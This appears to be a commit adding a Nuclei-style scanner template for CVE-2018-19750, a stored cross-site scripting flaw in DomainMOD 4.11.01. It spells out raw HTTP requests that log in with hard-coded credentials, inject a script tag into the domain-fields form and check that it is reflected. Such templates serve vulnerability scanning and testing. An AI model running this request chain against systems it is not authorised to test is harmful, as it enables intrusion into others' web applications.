Create CVE-2018-19750.yaml

CVE-2018-19750.yaml

@@ -0,0 +1,61 @@
+id: CVE-2018-19750
+
+info:
+  name: DomainMOD 4.11.01 - 'admin/domain-fields/' Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via admin/domain-fields/ Display Name, Description & Notes fields parameters.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19750
+    - https://www.exploit-db.com/exploits/45946
+    
+  metadata:
+    verified: true
+  tags: wbcecms,xss
+
+requests:
+  - raw:
+
+      - |
+        POST /domain/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+       
+        new_username=admin&new_password=admin123
+
+      - |
+        POST /domain/admin/domain-fields/add.php HTTP/1.1
+        Host: {{Hostname}}    
+        Content-Type: application/x-www-form-urlencoded
+        Origin: https://{{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+
+        new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_field_name=field&new_field_type_id=1&new_description=&new_notes=
+
+      - |
+        GET /domain/admin/domain-fields/ HTTP/1.1
+        Host: {{Hostname}}    
+        Content-Type: application/x-www-form-urlencoded
+
+
+    cookie-reuse: true           
+    matchers-condition: and
+    redirects: true
+    max-redirects: 3
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(1)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200